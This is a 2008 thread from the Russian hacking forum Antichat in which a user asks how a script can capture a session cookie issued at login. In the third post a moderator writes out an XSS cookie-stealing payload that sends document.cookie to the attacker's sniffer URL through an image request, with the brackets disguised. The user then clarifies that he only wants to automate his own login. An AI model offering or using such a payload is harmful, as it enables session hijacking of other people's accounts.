ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Снова о куке!!! При авторизации сервер ее дает, как сохр...
  #1  
Старый 06.07.2008, 15:10
UID: 60130
USER: rcc0023
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
Talking Снова о куке!!! При авторизации сервер ее дает, как сохр...

Снова вопрос о куке!
Есть сервер X, при авторизации он передает куку... так вот, какой скрипт может перехватить переданную им (сервером X) куку??
 
Ответить с цитированием

  #2  
Старый 06.07.2008, 15:12
UID: 60351
USER: Ильич
Ильич
Banned
Регистрация: 05.07.2008
Сообщений: 16
Провел на форуме:
23890

Репутация: 8
По умолчанию

никакой
 
Ответить с цитированием

  #3  
Старый 06.07.2008, 15:27
UID: 32695
USER: Kusto
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

блин все так туманно расписанно- непойму ты XSS нашел а как ей воспользоваться незнаеш? я правильно понял?, ну для начала тебе снифер нужен ну а потом попробуй вставить что то наподобие (script)img=new Image();img.src="адрес твоего снифера"+document.cookie;(/script)
P.S. единственное замени ) на > ну и обратную скобку на < в словах script
 
Ответить с цитированием

  #4  
Старый 06.07.2008, 15:42
UID: 60130
USER: rcc0023
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Да не)))

Я написал скрипт (назовем его My_script), который передает пост запрос с обязательной кукой, в которой содержится сессия. Эта сессия на 2 часа, далее идет логаут... сессия уже не действительна. Необходимо снова логинится и забивать в скрипт My_script данные куки... я хочу чтобы новую куку брал скрипт...
 
Ответить с цитированием

  #5  
Старый 06.07.2008, 15:46
UID: 60130
USER: rcc0023
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

post запрос с логин\паролем скрипту www.chuzoy_site.py/LOGIN.PHP ... он дает ответ, в котором кука... нужно ее сохранить
 
Ответить с цитированием

  #6  
Старый 06.07.2008, 16:01
UID: 42456
USER: -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

используй /dev/head/
в гугле поищи...
хорошая вещь...
 
Ответить с цитированием

  #7  
Старый 06.07.2008, 16:16
UID: 60130
USER: rcc0023
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Мм... -Hormold-, я не профи)) подробней бы
и у мну нет никса... одни окна... (на домашнем хочу..)
 
Ответить с цитированием

  #8  
Старый 06.07.2008, 16:19
UID: 60351
USER: Ильич
Ильич
Banned
Регистрация: 05.07.2008
Сообщений: 16
Провел на форуме:
23890

Репутация: 8
По умолчанию

Цитата:
используй /dev/head/
Цитата:
и у мну нет никса...
 
Ответить с цитированием

  #9  
Старый 06.07.2008, 16:45
UID: 60130
USER: rcc0023
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Ну так как?? Опять будете до последнего молчать??!?!?
 
Ответить с цитированием

  #10  
Старый 07.07.2008, 01:52
UID: 60130
USER: rcc0023
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Ну ответьте.. какой скрипт это может проделать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Raid, Scsi Cthulchu Аппаратное обеспечение 5 22.11.2008 16:45
Xss без Xss k00p3r Чужие Статьи 5 08.09.2008 15:53
Кэш браузера или Как была доказана твоя вина MorpheuS Авторские статьи 19 21.05.2007 03:27
Боевой Софт в Linux SladerNon Чужие Статьи 2 10.07.2005 21:11
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ